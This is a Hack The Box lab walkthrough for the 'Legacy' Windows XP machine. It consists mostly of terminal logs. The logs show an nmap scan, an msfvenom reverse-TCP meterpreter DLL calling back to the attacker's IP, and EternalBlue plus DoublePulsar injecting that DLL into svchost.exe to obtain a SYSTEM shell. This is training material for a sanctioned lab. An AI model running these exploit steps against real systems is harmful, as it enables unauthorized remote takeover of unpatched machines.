Legacy (HACKTHEBOX)

root@kali:~/Downloads# nmap -A 10.10.10.4
Starting Nmap 7.70 ( https://nmap.org ) at 2019-04-07 21:04 EDT
Nmap scan report for 10.10.10.4
Host is up (0.13s latency).
Not shown: 997 filtered ports
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (94%), General Dynamics embedded (88%)
OS CPE: cpe:/o:microsoft:windows_xp::sp3 cpe:/o:microsoft:windows_server_2003::sp1 cpe:/o:microsoft:windows_server_2003::sp2 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP3 (94%), Microsoft Windows Server 2003 SP1 or SP2 (92%), Microsoft Windows XP (92%), Microsoft Windows Server 2003 SP2 (92%), Microsoft Windows 2003 SP2 (91%), Microsoft Windows 2000 SP4 (91%), Microsoft Windows XP SP2 or Windows Server 2003 (91%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: 5d00h22m31s, deviation: 2h07m16s, median: 4d22h52m31s
|_nbstat: NetBIOS name: LEGACY, NetBIOS user: , NetBIOS MAC: 00:50:56:8f:b6:69 (VMware)
| smb-os-discovery:
| OS: Windows XP (Windows 2000 LAN Manager)
| OS CPE: cpe:/o:microsoft:windows_xp::-
| Computer name: legacy
| NetBIOS computer name: LEGACY\x00
| Workgroup: HTB\x00
|_ System time: 2019-04-13T05:57:25+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 3389/tcp)
HOP RTT ADDRESS
1 134.72 ms 10.10.14.1
2 134.82 ms 10.10.10.4

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 272.36 seconds

msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set LHOST 10.10.14.93
LHOST => 10.10.14.93
msf5 exploit(multi/handler) > set LPORT 6000
LPORT => 6000
msf5 exploit(multi/handler) > exploit

on another terminal

root@kali:~/Downloads# mkdir 10.10.10.4
root@kali:~/Downloads# cd 10.10.10.4
root@kali:~/Downloads/10.10.10.4# WINEPREFIX=”$HOME/.wine-fuzzbunch” WINEARCH=win32 wine wineboot
wine: created the configuration directory ‘/root/.wine-fuzzbunch’
0012:err:ole:marshal_object couldn’t get IPSFactory buffer for interface {00000131-0000-0000-c000-000000000046}
0012:err:ole:marshal_object couldn’t get IPSFactory buffer for interface {6d5140c1-7436-11ce-8034-00aa006009fa}
0012:err:ole:StdMarshalImpl_MarshalInterface Failed to create ifstub, hres=0x80004002
0012:err:ole:CoMarshalInterface Failed to marshal the interface {6d5140c1-7436-11ce-8034-00aa006009fa}, 80004002
0012:err:ole:get_local_server_stream Failed: 80004002
0014:err:ole:marshal_object couldn’t get IPSFactory buffer for interface {00000131-0000-0000-c000-000000000046}
0014:err:ole:marshal_object couldn’t get IPSFactory buffer for interface {6d5140c1-7436-11ce-8034-00aa006009fa}
0014:err:ole:StdMarshalImpl_MarshalInterface Failed to create ifstub, hres=0x80004002
0014:err:ole:CoMarshalInterface Failed to marshal the interface {6d5140c1-7436-11ce-8034-00aa006009fa}, 80004002
0014:err:ole:get_local_server_stream Failed: 80004002
Could not load wine-gecko. HTML rendering will be disabled.
wine: configuration in ‘/root/.wine-fuzzbunch’ has been updated.
root@kali:~/Downloads/10.10.10.4# WINEPREFIX=”$HOME/.wine-fuzzbunch” winetricks python26
bash: winetricks: command not found
root@kali:~/Downloads/10.10.10.4# apt-get install winetricks
Reading package lists… Done
Building dependency tree
Reading state information… Done
The following additional packages will be installed:
fuseiso
The following NEW packages will be installed:
fuseiso winetricks
0 upgraded, 2 newly installed, 0 to remove and 281 not upgraded.
Need to get 303 kB of archives.
After this operation, 1,050 kB of additional disk space will be used.
Do you want to continue? [Y/n] y
Get:1 http://ftp.yzu.edu.tw/Linux/kali kali-rolling/main amd64 fuseiso amd64 20070708-3.2+b1 [20.4 kB]
Get:2 http://ftp.yzu.edu.tw/Linux/kali kali-rolling/contrib amd64 winetricks all 0.0+20181203-3 [283 kB]
Fetched 303 kB in 6s (50.2 kB/s)
Selecting previously unselected package fuseiso.
(Reading database … 422571 files and directories currently installed.)
Preparing to unpack …/fuseiso_20070708-3.2+b1_amd64.deb …
Unpacking fuseiso (20070708-3.2+b1) …
Selecting previously unselected package winetricks.
Preparing to unpack …/winetricks_0.0+20181203-3_all.deb …
Unpacking winetricks (0.0+20181203-3) …
Setting up fuseiso (20070708-3.2+b1) …
Setting up winetricks (0.0+20181203-3) …
Processing triggers for mime-support (3.62) …
Processing triggers for hicolor-icon-theme (0.17-2) …
Processing triggers for gnome-menus (3.31.4-3) …
Processing triggers for man-db (2.8.5-2) …

Processing triggers for desktop-file-utils (0.23-4) …
root@kali:~/Downloads/10.10.10.4# WINEPREFIX=”$HOME/.wine-fuzzbunch” winetricks python26
——————————————————
Running Wine/winetricks as root is highly discouraged. See https://wiki.winehq.org/FAQ#Should_I_run_Wine_as_root.3F
——————————————————
Using winetricks 20181203 – sha256sum: b4b29a961905bfed1db98f10e2f09a356b719861fc8602ffbf813a22579b2848 with wine-4.0 (Debian 4.0-1) and WINEARCH=win32
Executing w_do_call python26
Executing load_python26
Executing mkdir -p /root/.cache/winetricks/python26
Executing cd /root/.cache/winetricks/python26
Downloading https://www.python.org/ftp/python/2.6.2/python-2.6.2.msi to /root/.cache/winetricks/python26
–2019-04-07 21:18:03– https://www.python.org/ftp/python/2.6.2/python-2.6.2.msi
Resolving www.python.org (www.python.org)… 151.101.36.223, 2a04:4e42:25::223
Connecting to www.python.org (www.python.org)|151.101.36.223|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 14536192 (14M) [application/octet-stream]
Saving to: ‘python-2.6.2.msi’

python-2.6.2.msi 100%[=======================================================================>] 13.86M 1.25MB/s in 16s

2019-04-07 21:18:20 (915 KB/s) – ‘python-2.6.2.msi’ saved [14536192/14536192]

Executing cd /root/Downloads/10.10.10.4
Executing cd /root/.cache/winetricks/python26
Downloading https://downloads.sourceforge.net/project/pywin32/pywin32/Build%20214/pywin32-214.win32-py2.6.exe to /root/.cache/winetricks/python26
–2019-04-07 21:18:20– https://downloads.sourceforge.net/project/pywin32/pywin32/Build%20214/pywin32-214.win32-py2.6.exe
Resolving downloads.sourceforge.net (downloads.sourceforge.net)… 216.105.38.13
Connecting to downloads.sourceforge.net (downloads.sourceforge.net)|216.105.38.13|:443… connected.
HTTP request sent, awaiting response… 302 Found
Location: https://excellmedia.dl.sourceforge.net/project/pywin32/pywin32/Build%20214/pywin32-214.win32-py2.6.exe [following]
–2019-04-07 21:18:21– https://excellmedia.dl.sourceforge.net/project/pywin32/pywin32/Build%20214/pywin32-214.win32-py2.6.exe
Resolving excellmedia.dl.sourceforge.net (excellmedia.dl.sourceforge.net)… 202.153.32.19
Connecting to excellmedia.dl.sourceforge.net (excellmedia.dl.sourceforge.net)|202.153.32.19|:443… connected.
HTTP request sent, awaiting response… 200 OK
Length: 6438204 (6.1M) [application/octet-stream]
Saving to: ‘pywin32-214.win32-py2.6.exe’

pywin32-214.win32-py2.6.exe 100%[=======================================================================>] 6.14M 1.79MB/s in 3.6s

2019-04-07 21:18:25 (1.70 MB/s) – ‘pywin32-214.win32-py2.6.exe’ saved [6438204/6438204]

Executing cd /root/Downloads/10.10.10.4
Executing cd /root/.cache/winetricks/python26
Executing wine msiexec /i python-2.6.2.msi ALLUSERS=1
0009:err:mscoree:LoadLibraryShim error reading registry key for installroot
0009:err:mscoree:LoadLibraryShim error reading registry key for installroot
0009:err:mscoree:LoadLibraryShim error reading registry key for installroot
0009:err:mscoree:LoadLibraryShim error reading registry key for installroot
Executing mkdir -p /root/.cache/winetricks/ahk
Executing cd /root/.cache/winetricks/ahk
Downloading https://www.autohotkey.com/download/AutoHotkey104805.zip to /root/.cache/winetricks/ahk
–2019-04-07 21:18:37– https://www.autohotkey.com/download/AutoHotkey104805.zip
Resolving www.autohotkey.com (www.autohotkey.com)… 104.25.120.16, 104.25.121.16, 2606:4700:20::6819:7810, …
Connecting to www.autohotkey.com (www.autohotkey.com)|104.25.120.16|:443… connected.
HTTP request sent, awaiting response… 301 Moved Permanently
Location: https://www.autohotkey.com/download/1.0/AutoHotkey104805.zip [following]
–2019-04-07 21:18:38– https://www.autohotkey.com/download/1.0/AutoHotkey104805.zip
Reusing existing connection to www.autohotkey.com:443.
HTTP request sent, awaiting response… 200 OK
Length: 2047047 (2.0M) [application/octet-stream]
Saving to: ‘AutoHotkey104805.zip’

AutoHotkey104805.zip 100%[=======================================================================>] 1.95M 1.13MB/s in 1.7s

2019-04-07 21:18:41 (1.13 MB/s) – ‘AutoHotkey104805.zip’ saved [2047047/2047047]

Executing cd /root/.cache/winetricks/python26
Executing wine y:\ahk\AutoHotkey.exe C:\windows\Temp\_python26\tmp.ahk
002b:err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.
root@kali:~/Downloads/10.10.10.4# cd $HOME/.wine-fuzzbunch/drive_c && git clone https://github.com/mdiazcl/fuzzbunch-debian
Cloning into ‘fuzzbunch-debian’…
remote: Enumerating objects: 8888, done.
remote: Total 8888 (delta 0), reused 0 (delta 0), pack-reused 8888
Receiving objects: 100% (8888/8888), 153.09 MiB | 1.27 MiB/s, done.
Resolving deltas: 100% (3401/3401), done.
Checking out files: 100% (8402/8402), done.
root@kali:~/.wine-fuzzbunch/drive_c# sudo nano /usr/local/bin/fuzzbunch
root@kali:~/.wine-fuzzbunch/drive_c# sudo chmod +x /usr/local/bin/fuzzbunch
root@kali:~/.wine-fuzzbunch/drive_c# cd $HOME/.wine-fuzzbunch/drive_c/
root@kali:~/.wine-fuzzbunch/drive_c# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.93 LPORT=6000 -f dll -o shell.dll
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of dll file: 5120 bytes
Saved as: shell.dll
root@kali:~/.wine-fuzzbunch/drive_c# fuzzbunch
0009:err:winediag:SECUR32_initNTLMSP ntlm_auth was not found or is outdated. Make sure that ntlm_auth >= 3.0.25 is in your path. Usually, you can find it in the winbind package of your distribution.

–[ Version 3.5.1

[*] Loading Plugins
[*] Initializing Fuzzbunch v3.5.1
[*] Adding Global Variables
[+] Set ResourcesDir => C:\fuzzbunch-debian\windows\Resources
[+] Set Color => True
[+] Set ShowHiddenParameters => False
[+] Set NetworkTimeout => 60
[+] Set LogDir => C:\fuzzbunch-debian\logs
[*] Autorun ON

ImplantConfig Autorun List
==========================

0) prompt confirm
1) execute

Exploit Autorun List
====================

0) apply
1) touch all
2) prompt confirm
3) execute

Special Autorun List
====================

0) apply
1) touch all
2) prompt confirm
3) execute

Payload Autorun List
====================

0) apply
1) prompt confirm
2) execute

[+] Set FbStorage => C:\fuzzbunch-debian\windows\storage

[*] Retargetting Session

[?] Default Target IP Address [] : 10.10.10.4
[?] Default Callback IP Address [] : 10.10.14.93
[?] Use Redirection [yes] : no

[?] Base Log directory [C:\fuzzbunch-debian\logs] :
[*] Checking C:\fuzzbunch-debian\logs for projects
Index Project
—– ——-
0 Create a New Project

[?] Project [0] : 0
[?] New Project Name : LEGACY
[?] Set target log directory to ‘C:\fuzzbunch-debian\logs\legacy\z10.10.10.4’? [Yes] :

[*] Initializing Global State
[+] Set TargetIp => 10.10.10.4
[+] Set CallbackIp => 10.10.14.93

[!] Redirection OFF
[+] Set LogDir => C:\fuzzbunch-debian\logs\legacy\z10.10.10.4
[+] Set Project => legacy

fb > use EternalBlue

[!] Entering Plugin Context :: Eternalblue
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.10.10.4

[*] Applying Session Parameters
[*] Running Exploit Touches

[!] Enter Prompt Mode :: Eternalblue

Module: Eternalblue
===================

Name Value
—- —–
NetworkTimeout 60
TargetIp 10.10.10.4
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
Target WIN72K8R2

[!] plugin variables are valid
[?] Prompt For Variable Settings? [Yes] :

[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*] TargetIp :: Target IP Address

[?] TargetIp [10.10.10.4] :

[*] TargetPort :: Port used by the SMB service for exploit connection

[?] TargetPort [445] :

[*] VerifyTarget :: Validate the SMB string from target against the target selected before exploitation.

[?] VerifyTarget [True] :

[*] VerifyBackdoor :: Validate the presence of the DOUBLE PULSAR backdoor before throwing. This option must be enabled for multiple exploit attempts.

[?] VerifyBackdoor [True] :

[*] MaxExploitAttempts :: Number of times to attempt the exploit and groom. Disabled for XP/2K3.

[?] MaxExploitAttempts [3] :

[*] GroomAllocations :: Number of large SMBv2 buffers (Vista+) or SessionSetup allocations (XK/2K3) to do.

[?] GroomAllocations [12] :

[*] Target :: Operating System, Service Pack, and Architecture of target OS

0) XP Windows XP 32-Bit All Service Packs
*1) WIN72K8R2 Windows 7 and 2008 R2 32-Bit and 64-Bit All Service Packs

[?] Target [1] : 0
[+] Set Target => XP

[!] Preparing to Execute Eternalblue

[*] Mode :: Delivery mechanism

*0) DANE Forward deployment via DARINGNEOPHYTE
1) FB Traditional deployment from within FUZZBUNCH

[?] Mode [0] : 1
[+] Run Mode: FB

[?] This will execute locally like traditional Fuzzbunch plugins. Are you sure? (y/n) [Yes] :
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel – local-tunnel-1
[?] Destination IP [10.10.10.4] :
[?] Destination Port [445] :
[+] (TCP) Local 10.10.10.4:445

[+] Configure Plugin Remote Tunnels

Module: Eternalblue
===================

Name Value
—- —–
DaveProxyPort 0
NetworkTimeout 60
TargetIp 10.10.10.4
TargetPort 445
VerifyTarget True
VerifyBackdoor True
MaxExploitAttempts 3
GroomAllocations 12
ShellcodeBuffer
Target XP

[?] Execute Plugin? [Yes] : y
[*] Executing Plugin
[*] Connecting to target for exploitation.
[+] Connection established for exploitation.
[*] Pinging backdoor…
[+] Backdoor not installed, game on.
[*] Forcing MaxExploitAttempts to 1.
[*] Target OS selected valid for OS indicated by SMB reply
[*] CORE raw buffer dump (12 bytes):
0x00000000 57 69 6e 64 6f 77 73 20 35 2e 31 00 Windows 5.1.
[*] Fingerprinting SMB non-paged pool quota
[+] Allocation total: 0xfff4
[+] Spray size: 0
[+] Allocation total: 0x1ffe8
[+] Spray size: 1
[+] Allocation total: 0x2ffdc
[+] Spray size: 2
[+] Allocation total: 0x3ffd0
[+] Spray size: 3
[+] Allocation total: 0x4ffc4
[+] Spray size: 4
[+] Allocation total: 0x5ffb8
[+] Spray size: 5
[+] Allocation total: 0x6ffac
[+] Spray size: 6
[+] Allocation total: 0x7ffa0
[+] Spray size: 7
[+] Allocation total: 0x8ff94
[+] Spray size: 8
[+] Allocation total: 0x9ff88
[+] Spray size: 9
[+] Allocation total: 0xaff7c
[+] Spray size: 10
[+] Allocation total: 0xbff70
[+] Spray size: 11
[+] Quota NOT exceeded after 12 packets
[+] Allocation total: 0xbff70
[*] Building exploit buffer
[*] Sending all but last fragment of exploit packet
…………….DONE.
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Starting non-paged pool grooming
[+] Sending 2 non-paged pool fragment packets
….DONE.
[+] Sent 2 non-paged pool fragment packets ofsize 0x00006FF9
[+] Sending 10 non-paged pool grooming packets
……….DONE.
[+] Sent 10 non-paged pool grooming packets – groom complete
[*] Sending SMB Echo request
[*] Good reply from SMB Echo request
[*] Sending last fragment of exploit packet!
DONE.
[*] Receiving response from exploit packet
[+] ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] Triggering free of corrupted buffer.
[*] Pinging backdoor…
[+] Backdoor returned code: 10 – Success!
[+] Ping returned Target architecture: x86 (32-bit)
[+] Backdoor installed
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[*] CORE sent serialized output blob (2 bytes):
0x00000000 08 00 ..
[*] Received output parameters from CORE
[+] CORE terminated with status code 0x00000000
[+] Eternalblue Succeeded

fb Special (Eternalblue) > use DoublePulsar

[!] Entering Plugin Context :: Doublepulsar
[*] Applying Global Variables
[+] Set NetworkTimeout => 60
[+] Set TargetIp => 10.10.10.4

[*] Applying Session Parameters

[!] Enter Prompt Mode :: Doublepulsar

Module: Doublepulsar
====================

Name Value
—- —–
NetworkTimeout 60
TargetIp 10.10.10.4
TargetPort 445
OutputFile
Protocol SMB
Architecture x86
Function OutputInstall

[!] Plugin Variables are NOT Valid
[?] Prompt For Variable Settings? [Yes] :

[*] NetworkTimeout :: Timeout for blocking network calls (in seconds). Use -1 for no timeout.

[?] NetworkTimeout [60] :

[*] TargetIp :: Target IP Address

[?] TargetIp [10.10.10.4] :

[*] TargetPort :: Port used by the Double Pulsar back door

[?] TargetPort [445] :

[*] Protocol :: Protocol for the backdoor to speak

*0) SMB Ring 0 SMB (TCP 445) backdoor
1) RDP Ring 0 RDP (TCP 3389) backdoor

[?] Protocol [0] :

[*] Architecture :: Architecture of the target OS

*0) x86 x86 32-bits
1) x64 x64 64-bits

[?] Architecture [0] :

[*] Function :: Operation for backdoor to perform

*0) OutputInstall Only output the install shellcode to a binary file on disk.
1) Ping Test for presence of backdoor
2) RunDLL Use an APC to inject a DLL into a user mode process.
3) RunShellcode Run raw shellcode
4) Uninstall Remove’s backdoor from system

[?] Function [0] : 2
[+] Set Function => RunDLL

[*] DllPayload :: DLL to inject into user mode

[?] DllPayload [] :

[*] DllPayload :: DLL to inject into user mode

[?] DllPayload [] : C:\shell.dll
[+] Set DllPayload => C:\shell.dll

[*] DllOrdinal :: The exported ordinal number of the DLL being injected to call

[?] DllOrdinal [1] :

[*] ProcessName :: Name of process to inject into

[?] ProcessName [lsass.exe] : svchost.exe
[+] Set ProcessName => svchost.exe

[*] ProcessCommandLine :: Command line of process to inject into

[?] ProcessCommandLine [] :

[!] Preparing to Execute Doublepulsar
[*] Redirection OFF

[+] Configure Plugin Local Tunnels
[+] Local Tunnel – local-tunnel-1
[?] Destination IP [10.10.10.4] :
[?] Destination Port [445] :
[+] (TCP) Local 10.10.10.4:445

[+] Configure Plugin Remote Tunnels

Module: Doublepulsar
====================

Name Value
—- —–
NetworkTimeout 60
TargetIp 10.10.10.4
TargetPort 445
DllPayload C:\shell.dll
DllOrdinal 1
ProcessName svchost.exe
ProcessCommandLine
Protocol SMB
Architecture x86
Function RunDLL

[?] Execute Plugin? [Yes] :
[*] Executing Plugin
[+] Selected Protocol SMB
[.] Connecting to target…
[+] Connected to target, pinging backdoor…
[+] Backdoor returned code: 10 – Success!
[+] Ping returned Target architecture: x86 (32-bit) – XOR Key: 0x008A2287
SMB Connection string is: Windows 5.1
Target OS is: XP x86
[+] Backdoor installed
[+] DLL built
[.] Sending shellcode to inject DLL
[+] Backdoor returned code: 10 – Success!
[+] Backdoor returned code: 10 – Success!
[+] Backdoor returned code: 10 – Success!
[+] Command completed successfully
[+] Doublepulsar Succeeded

fb Payload (Doublepulsar) >

back to listner

msf5 exploit(multi/handler) > exploit

[*] Started reverse TCP handler on 10.10.14.93:6000
[*] Sending stage (179779 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.93:6000 -> 10.10.10.4:1033) at 2019-04-07 21:30:14 -0400

meterpreter > geuid
[-] Unknown command: geuid.
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

@SAKSHAM DIXIT